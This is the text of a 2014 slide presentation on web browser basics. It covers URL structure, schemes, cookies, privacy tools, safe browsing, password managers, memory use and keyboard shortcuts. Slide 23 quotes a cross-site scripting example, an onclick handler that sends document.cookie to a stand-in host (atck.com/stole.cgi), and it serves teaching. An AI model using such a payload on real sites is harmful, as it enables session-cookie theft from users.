10/14/14 RCSI Presentation

1. Web Browser Basics, Tips, & Tricks
Mark S. Zinzow
Slideshare.net/msz

2. Recognize any of these icons?
What do they have in common?

3. How many web browsers are there?
SRWare Iron
PaleMoon.org

4. Why pick one over another?
Speed, Safety, Standards Compliant
w3.org
http://securitywatch.pcmag.com/web-browsers/325447-are-you-
using-the-most-secure-web-browser

5. Web Browser Jargon: WWW, HTML, URL, etc.
The Internet depends on a great deal of technical
detail to work. Understanding a few basic terms
will help, but many of them are inter-related to many
other bits of jargon.
Please bear with me as I show you some rigorous
definitions in order to highlight useful parts to know,
and talk about what web browsers actually do.

6. What is a Web Browser?
“A web browser (commonly referred to as a browser) is
a software application for retrieving, presenting and
traversing information resources on the World Wide
Web. An information resource is identified by a
R Uniform Reessoouurrccee IIddeennttiiffiieerr ((UURRII//UURRLL)) and may be
a web page, image, video or other piece of content.[1]
Hyperlinks present in resources enable users easily to
navigate their browsers to related resources.”
http://en.wikipedia.org/wiki/Web_browser
http://en.wikipedia.org/wiki/World_Wide_Web

7. What is a URL?
“A uniform resource locator (abbreviated URL;
also known as a web address, particularly
when used with HTTP) is a specific character
string that constitutes a reference to a
resource. Most web browsers display the
URL of a web page above the page in an
address bar.” A URL is a form of a uniform resource identifier (URI).
This definition can be found at this URL:
http://en.wikipedia.org/wiki/Uniform_resource_locator

8. How does a URL work?
“A uniform resource name (URN) functions like a person's
name, while a uniform resource locator (URL) resembles
that person's street address. In other words: the URN
defines an item's identity, while the URL provides a method
for finding it.”
http://en.wikipedia.org/wiki/Uniform_resource_identifier
“The URI syntax consists of a URI scheme name (such as
"http", "ftp", "mailto", "crid" or "file") followed by a colon
character, and then by a scheme-specific part.”
http://en.wikipedia.org/wiki/Uniform_resource_identifier

9. What are the parts of a URL? (1)
scheme://domain:port/path?query_string#fragment_id
The scheme, often referred to as protocol, defines how the resource will be obtained. Examples
include http, https, ftp, file and many others. Although schemes are case-insensitive, the canonical form
is lowercase.
The domain name or literal numeric IP address gives the destination location for the URL. A literal
numeric IPv6 address may be given, but must be enclosed in [ ] e.g. [db8:0cec::99:123a].
The domain google.com, or its numeric IP address 173.194.34.5, is the address of Google's website.
The domain name portion of a URL is not case sensitive since DNS ignores case:
http://en.example.org/ and HTTP://EN.EXAMPLE.ORG/ both open the same page.
The port number, given in decimal, is optional; if omitted, the default for the scheme is used.
For example, http://vnc.example.com:5800 connects to port 5800 of vnc.example.com, which may be
appropriate for a VNC remote control session. If the port number is omitted for an http: URL, the
browser will connect on port 80, the default HTTP port. The default port for an https: request is 443.

10. What are the parts of a URL? (2)
protocol://domain:port/path?query_string#fragment_id
The path is used to specify and perhaps find the resource requested. It is case-sensitive,
[13] though it may be treated as case-insensitive by some servers, especially those based
on Microsoft Windows.
If the server is case sensitive and http://en.example.org/wiki/URL is correct, then
http://en.example.org/WIKI/URL or http://en.example.org/wiki/url will display an HTTP 404
error page, unless these URLs point to valid resources themselves.
The query string contains data to be passed to software running on the server. It may
contain name/value pairs separated by ampersands, for example
?first_name=John&last_name=Doe.
The fragment identifier, if present, specifies a part or a position within the overall resource
or document.
When used with HTML, it usually specifies a section or location within the page, and used in
combination with Anchor Tags the browser is scrolled to display that part of the page.
http://en.wikipedia.org/wiki/Uniform_resource_locator

11. Examples using URL parts
Query String: https://www.google.com/search?q=url
ftp://username:password@hostname/dir/dir/file.ext
Fragment Identifier:
http://www.w3.org/TR/REC-html40/intro/intro.html#h-2.1.2

12. Example uses for different protocols
● https: for secure encrypted connections to banks, or private
information.
● About: to display information and access (sometimes obscure)
settings of your web browser.
● File: to access a local or network file.
● Javascript: execute javascript program code.
● http: Your average ordinary web page.
For a complete list see: http://en.wikipedia.org/wiki/URI_scheme

13. https: Secure Encrypted connections
“Transport Layer Security (TLS) and its
predecessor, Secure Sockets Layer (SSL), are
cryptographic protocols designed to provide
communication security over the Internet.[1] They
use X.509 certificates and hence asymmetric
cryptography to authenticate the counterparty with
whom they are communicating, and to exchange a
symmetric key. This session key is then used to
encrypt data flowing between the parties. This
allows for data/message confidentiality, and
message authentication codes for message
integrity and as a by-product, message
authentication.”
http://en.wikipedia.org/wiki/Transport_Layer_S
ecurity

14. ●About: Display Information and Settings
about:
about:config

15. ●About: Display Information and Settings
chrome://about
chrome://settings

16. File: Access a Local or Network File

17. Javascript: Execute Program Code
javascript:alert('Hello World!');
javascript:alert(Math.PI);
http://www.landofcode.com/web-development-how-to/javascript-address-bar.php

18. More fun with Javascript
WikiHow: How to Use JavaScript Injections
http://www.wikihow.com/Use-JavaScript-Injections
Bookmarklets: http://dmcritchie.mvps.org/ie/bookmarklets.htm
Learn Javascript - W3Schools: http://www.w3schools.com/js/
The Beginner’s Guide to Greasemonkey User Scripts in Firefox
http://www.howtogeek.com/howto/16470/replace-extensions-with-user-
scripts-in-firefox/
Chickenfoot 1.0.8 Web Automation & Customization (not supported)
https://github.com/bolinfest/chickenfoot/downloads
https://www.youtube.com/watch?v=5wXWMuYM37s
Javascript:void(document.bgColor="LightSkyBlue")

19. More fun with Javascript, etc.
http://bolinfest.com/javascript/misunderstood.html
This book is not designed to teach you JavaScript, but it does recognize that you are likely
to have taught yourself JavaScript and that there are some key concepts that you may have
missed along the way.
Source for Greasemonkey etc. scripts: https://greasyfork.org/
Contemporary Open Source Web Automation Software
Selenium 2.0 WebDriver – How to Configure Selenium Webdriver in Eclipse and execute
some simple test script.
http://www.softwaretestingclub.com/profiles/blogs/selenium-2-0-webdriver-how-to-configure-
selenium-webdriver-in
Mozilla Webmaker Tools, including X-Ray Goggles (see how the web
works), Thimble, Popcorn Maker, and Appmaker.
https://webmaker.org/tools https://goggles.webmaker.org/en-US

20. Cookies

21. What does a Cookie Look Like?
javascript:
alert(document.cookie);
Note: We can use a javascript url
to quickly view a cookie
associated with any webpage.
Google Chrome does not let you
paste a javascript URL directly,
but you can bookmark the script
for easier execution!
Why do you suppose
Weather.com stores more than
just your zip code?

22. Cookie Concerns
Snowden says the NSA uses QuantumCookies to ID Tor users.
A corrupt or invalid cookie can prevent access to a web site.
This slideshow is a nice introduction to Cookie issues:
http://www.slideshare.net/iamit/cookies-and-browser-exploits
Cross-Site Scripting (XSS) is a type of computer security vulnerability
typically found in Web applications. XSS enables attackers to inject
client-side script into Web pages viewed by other users. [By stealing
session cookies!]
“BEAST” (“Browser Exploit Against SSL/TLS”), CRIME, BREACH, etc.

23. Understanding XSS Video
http://www.secure-abap.de/wiki/Movies
Cross Site Scripting -
Lesson 1
Attack Code
Example:
<a href="#"
onclick="window.location=
http://atck.com/stole.cgi?
c=+escape(document.cook
ie); return false;">Click
here!</a>

24. Privacy

25. Do Not
Track
http://all
aboutdn
t.com/

26. Private
Searching?
5 Alternative Search Engines That Respect Your Privacy
http://www.howtogeek.com/113513/
Most Well Known “Do Not Track” Search
http://duckduckgo.com/
Like a Proxy Google anonymized search
https://www.startpage.com/
Multi-Engine: https://ixquick.com/
http://www.privatesearchengine.com/ -->
Blekko deletes personally identifiable
information within 48 hours.
http://blekko.com/

27. Firefox & Chrome add on
anonymox.net
Free Proxy supporting
many Countries.
hola.org

28. Safe Browsing
“Ads and toolbars are the scum and villainy of the browser world”
Eric Geier, PCWorld
“How to clean and secure your browser like a pro”
http://preview.tinyurl.com/pk64bvp
“Since no antivirus program can catch all the millions of infections, use a secondary scanner
such as Ad-Aware, Malwarebytes, Spybot Search & Destroy, or SuperAntiSpyware. The
scans may detect additional adware, viruses, and other malware. With luck, your antimalware
utilities can eliminate unwanted ads, browser toolbars, and browser-hijacking malware in one
go.”
http://www.techsupportalert.com/best-free-browser-protection-utility.htm
http://www.sandboxie.com/
Run programs in a sandbox to prevent rogue software, unwanted programs, spyware,
viruses, worms, and other malware from making permanent changes to your machine.
Surfing Protection Extensions? How to pick one that is trustworthy and unobtrusive?

29. Browser Hijacking
How to Avoid Installing Junk Programs When Downloading Free Software
http://www.howtogeek.com/168691/
How to Fix Browser Settings Changed By Malware or Other Programs
http://www.howtogeek.com/172141/
Why We Hate Recommending Software Downloads To Our Readers
http://www.howtogeek.com/189176/
The Shameful Saga of Uninstalling the Terrible Ask Toolbar
http://www.howtogeek.com/138516/
Avoid Java’s Ask Toolbar Installations With This One Weird Registry Hack
http://www.howtogeek.com/198240/

30. Avoid Java’s Ask Toolbar Installations
With This One Weird Registry Hack
http://www.howtogeek.com/198240/

31. Try Ninite.com for toolbar/junk free updates

32. More on Cleaning a Hijacked Browser
http://chrome.blogspot.com/2014/01/clean-up-your-hijacked-settings.
html

33. Reset Switch
Google Chrome - Look at the
end of Advanced Settings
Firefox - about:support or Help,
Troubleshooting Information

34. “Safe” Mode Start
How to start Firefox in Safe Mode
Click the menu button , click help and select “Restart with Add-ons Disabled...”. Firefox will
start up with the Firefox Safe Mode dialog.
Note: You can also start Firefox in Safe Mode by holding down the shift key while starting Firefox.
https://support.mozilla.org/en-US/kb/troubleshoot-firefox-issues-using-safe-mode
Google Chrome has similar features:
http://www.chromium.org/developers/how-tos/run-chromium-with-flags

35. Choose, Protect, and Store Secure Passwords
Why You Should Use a Password Manager and How to Get Started
http://www.howtogeek.com/141500/
https://lastpass.com/
Securely Store Your Passwords with KeePass
http://www.howtogeek.com/howto/4962/
http://www.wikihow.com/Choose-a-Secure-Password
How to Prevent People From Viewing Your Browser’s Saved
Passwords: http://www.howtogeek.com/169986/
How Secure are Your Saved Chrome Browser Passwords?
www.howtogeek.com/70146/
http://www.RoboForm.com/
Ask How-To Geek: What’s Wrong With Writing Down Your Password?
www.howtogeek.com/howto/31259/

36. System Resource Use & Performance
Most systems have a tool to monitor processes and
performance. In Windows it is the Task Manager which I
like to launch with the keyboard shortcut Ctrl-Shift-ESC.
Notice how Firefox uses the most
memory by far than any other
process, followed by Google Chrome
as a close second. Multiple tabs, too
many extensions, pages with lots of
scripts, multimedia, and memory
leaks can make this problem worse,
eventually slowing down your system
until you restart your browsers.

37. Memory use of browsers
Closing Firefox
and Google
Chrome dropped
memory use from
5.25Gb to 2.86Gb
in this example.
Restarting them
brought memory
usage back up to
3.49Gb.

38. Checking Google Chrome Memory Use
Because Chrome creates a separate process for each tab, you cannot easily see the total
usage. Typing about:memory in the address bar will take you to a report with totals.

39. Firefox about:memory tools

40. Lots More Tips & Tricks
50 tips and tricks for Chrome power users
http://www.infoworld.com/article/2610416/
15 Coolest Firefox Tricks Ever
http://www.lifehack.org/articles/technology/15-coolest-firefox-tricks-ever.
html
28 Coolest Firefox About:Config Tricks
http://www.maketecheasier.com/28-coolest-firefox-aboutconfig-tricks/
The Best About:Config Tweaks That Make Firefox Better
http://lifehacker.com/the-best-about-config-tweaks-that-make-firefox-better-
1442137111

41. Keyboard Shortcuts
47 Keyboard Shortcuts That Work in All Web Browsers
www.howtogeek.com/114518/
Google Chrome Cheat Sheet
http://chromecheat.blogspot.com/2008/09/google-chrome-shortcuts.html
Keyboard shortcuts - Perform common Firefox tasks quickly
https://support.mozilla.org/en-US/kb/keyboard-shortcuts-perform-firefox-tasks-
quickly
Top 10 Web Browser Keyboard Shortcuts
http://www.curtisjohnstone.com/?p=243

42. Keyboard Shortcuts
● CTRL+F5 forces the browser to re-fetch the page from the server.
● CTRL+SHIT+DELETE brings up a form to allow you to delete the cache.
● CTRL+H brings up your browsing history
● CTRL+J brings up your download history (Great to see where it is!)
● CTRL+F4 closes your browser window
● CTRL+W closes the current tab
● F11 toggles between full-screen and the regular view
● CTRL+TAB switches to the next tab
● CTRL + (click hyperlink) opens the link in a new tab in the background
● CTRL+SHIFT+P (IE & Firefox) opens a new window in private (aka
Incognito) mode, CTRL+SHIFT+N (Chrome)
● CTRL+ + / - / 0 Zoom in / out / reset zoom
● CTRL + U view page source
● CTRL + N / T New Window / New Tab
● CTRL + F find in page search
● CTRL + B toggle Bookmark search bar (Firefox)

43. Always update your software from the manufactures website and never download software
from CNET, Softonic or Brothersoft, it’s always bundled with a form of malware.
http://www.fixyourbrowser.com/how-to/how-did-malware-infect-my-computer/
How to Bypass and Reset the Password on Every Operating System
www.howtogeek.com/192825/
Note your system password is not adequate to protect your browser saved passwords.
Did you know that for Google Chrome to stay updated and current, you don’t need Google
Installer and Google Update and other services like them to start up? I’ve disabled those
applications and services from starting up, and Google Chrome continues to remain updated.”
http://www.makeuseof.com/tag/make-windows-start-faster-10-non-essential-startup-items-can-safely-
remove/
Guide to Most Useful Bookmarklets for Chrome, Firefox, Safari, etc.
http://www.labnol.org/internet/guide-to-useful-bookmarklets/7931/

44. VPN – Virtual Private Network
10 Reasons to Use a VPN for Private Web Browsing
http://netforbeginners.about.com/od/readerpicks/tp/Reasons-to-
Use-a-VPN-Service.htm
Why You Should Start Using a VPN (and How to Choose the
Best One for Your Needs)
http://lifehacker.com/5940565/

45. Run Android Apps in your Browser
How to Run Android Apps Inside Chrome
on Any Desktop Operating System
http://lifehacker.com/1637564101/
How to Run (Some) Android Apps In Your Chrome Browser
http://www.pcmag.com/article2/0,2817,2469232,00.asp

46. Questions, Comments?
● What are your favorite browser features, extensions, tips or
tricks?
● What do you use for surfing protection?
● What would you like to see demonstrated?